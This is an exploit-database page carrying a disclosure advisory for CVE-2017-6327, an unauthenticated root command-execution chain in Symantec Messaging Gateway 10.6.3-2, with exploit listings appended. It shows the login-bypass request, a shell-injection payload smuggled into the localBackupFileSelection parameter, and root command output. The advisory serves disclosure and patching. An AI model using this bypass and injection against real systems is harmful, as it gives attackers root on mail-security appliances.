Menu

Search for hundreds of thousands of exploits

"Symantec Messaging Gateway 10.6.3-2 - Root Remote Command Execution"

Author

Exploit author

"Philip Pettersson"

Platform

Exploit platform

jsp

Release date

Exploit published date

2017-08-18

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
This is an advisory for CVE-2017-6327 which is an unauthenticated remote
code execution flaw in the web interface of Symantec Messaging Gateway
prior to and including version 10.6.3-2, which can be used to execute
commands as root.

Symantec Messaging Gateway, formerly known as Brightmail, is a linux-based
anti-spam/security product for e-mail servers. It is deployed as a physical
device or with ESX in close proximity to the servers it is designed to
protect.

=*=*=*=*=*=*=*=*=    TIMELINE

2017-07-07: Reported to Symantec
2017-08-10: Patch and notice released by Symantec [1]
2017-08-18: Public technical advisory

=*=*=*=*=*=*=*=*=    DESCRIPTION

- Bug #1: Web authentication bypass

The web management interface is available via HTTPS, and you can't do much
without logging in.

If the current session (identified by the `JSESSIONID` cookie) has the
`user` attribute set, the session is considered authenticated.

The file LoginAction.class defines a number of public methods and they can
all be reached via unauthenticated web requests.

By making a GET request to `/brightmail/action1.do?method=method_name` we
can execute `LoginAction.method_name` if `method_name` is a public method.

One such public method which will be the target of our authentication
bypass is called `LoginAction.notificationLogin`.

It does the following:

1. Decrypt the `notify` parameter using `BrightmailDecrypt.decrypt`
2. Creates a new `UserTO` object using the decrypted `notify` parameter as
an email value
3. Creates a new session, invalidating the old one if necessary
4. Sets the `user` attribute of the newly created session to our
constructed UserTO object

It essentially takes a username value from a GET parameter and logs you in
as this user if it exists. If not, it creates this user for you.

We need to encrypt our `notify` argument so that
`BrightmailDecrypt.decrypt` will decrypt it properly. Fortunately the
encryption is just PBEWithMD5AndDES using a static password, conveniently
included in the code itself. I won't include the encryption password or a
fully encrypted notify string in this post.


Example request:

GET
/brightmail/action1.do?method=notificationLogin&notify=MTIzNDU2Nzg%3d6[...]&id=test
HTTP/1.1
...


HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
...
Set-Cookie: JSESSIONID=9E45E9F70FAC0AADAC9EB7A03532F65D; Path=/brightmail;
Secure; HttpOnly


- Bug #2: Command injection

The RestoreAction.performRestore method can be reached with an
authenticated session and it takes the restoreSource and
localBackupFilename parameters.

After a long chain of function calls, localBackupFilename ends up being
sent to the local "bmagent" daemon listening on port 41002. It will execute
/opt/Symantec/Brightmail/cli/bin/db-restore with argv[1] being our supplied
value.

The db-restore script is a sudo wrapper for
/opt/Symantec/Brightmail/cli/sbin/db-restore, which in turn is a perl
script containing a command injection in a call to /usr/bin/du.

$ /opt/Symantec/Brightmail/cli/bin/db-restore 'asdf;"`id`";'
/usr/bin/du: cannot access `/data/backups/asdf': No such file or directory
sh: uid=0(root) gid=0(root) groups=0(root): command not found
ERROR: Failed to copy 'asdf;"`id`";' from local backup store: No such file
or directory


This command injection can be exploited from the web management interface
with a valid session, which we can create using bug #1.

- Combining bug #1 and #2

The last step is to get a CSRF token since the vulnerable performRestore
function is annotated with @CSRF.

After some quick digging it turns out that all you need to do is call
/brightmail/common.jsp to get a token that will be valid for all your
requests.

The URL-encoded value we provide for the `localBackupFileSelection`
parameter is:
asdf`id>/data/bcc/webapps/brightmail/output.txt;/bin/uname
-a>>/data/bcc/webapps/brightmail/output.txt`hehehe

Request:

GET
/brightmail/admin/restore/action5.do?method=performRestore&symantec.brightmail.key.TOKEN=bbda9b0a52bca4a43cc2b6051cd6b95900068cd3&restoreSource=APPLIANCE&localBackupFileSelection=%61%73%64%66%60%69%64%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%3b%2f%62%69%6e%2f%75%6e%61%6d%65%20%2d%61%3e%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%60%68%65%68%65%68%65
HTTP/1.1
Host: 192.168.205.220
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0)
Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=34D61B34698831DB765A9DD5E0049D0B
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store,no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=UTF-8
Content-Length: 803
Date: Thu, 29 Jun 2017 06:48:12 GMT
Connection: close

<HTML>
<title>Symantec Messaging Gateway -&nbsp;Restore</title>
...


Now to confirm that our command output was correctly placed in a file
inside the webroot.

imac:~% curl -k https://192.168.205.220/brightmail/output.txt
uid=0(root) gid=0(root) groups=0(root)
Linux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13
22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux


=*=*=*=*=*=*=*=*=    EXPLOIT OUTPUT

imac:~/brightmail% python brightmail-rce.py
https://192.168.205.220/brightmail
bypassing login..
* JSESSIONID=693079639299816F80016123BE8A0167
verifying login bypass..
* Version: 10.6.3
getting csrf token..
* 1e35af8c567d3448a65c8516a835cec30b6b8b73
done, verifying..

uid=501(bcc) gid=99(nobody) euid=0(root) egid=0(root)
groups=0(root),99(nobody),499(mysql),502(bcc)
Linux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13
22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux


# cat /etc/issue

Symantec Messaging Gateway
Version 10.6.3-2
Copyright (c) 1998-2017 Symantec Corporation.  All rights reserved.


=*=*=*=*=*=*=*=*=    REFERENCES

[1]
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00

=*=*=*=*=*=*=*=*=    CREDIT

Philip Pettersson
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-11-12 "Atlassian Confluence 6.15.1 - Directory Traversal" webapps jsp max7253
2019-11-12 "Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)" webapps jsp max7253
2019-09-16 "NetGain EM Plus 10.1.68 - Remote Command Execution" webapps jsp azams
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection" webapps jsp "Wietse Boonstra"
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)" webapps jsp "Wietse Boonstra"
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution" webapps jsp "Wietse Boonstra"
2019-06-11 "Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting" webapps jsp "Valerio Brussani"
2019-06-05 "Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery" webapps jsp k8gege
2019-05-10 "dotCMS 5.1.1 - HTML Injection" webapps jsp "Ismail Tasdelen"
2019-03-11 "OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)" webapps jsp AkkuS
Release Date Title Type Platform Author
2017-12-14 "Palo Alto Networks Firewalls - Root Remote Code Execution" remote hardware "Philip Pettersson"
2017-08-18 "Symantec Messaging Gateway 10.6.3-2 - Root Remote Command Execution" webapps jsp "Philip Pettersson" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected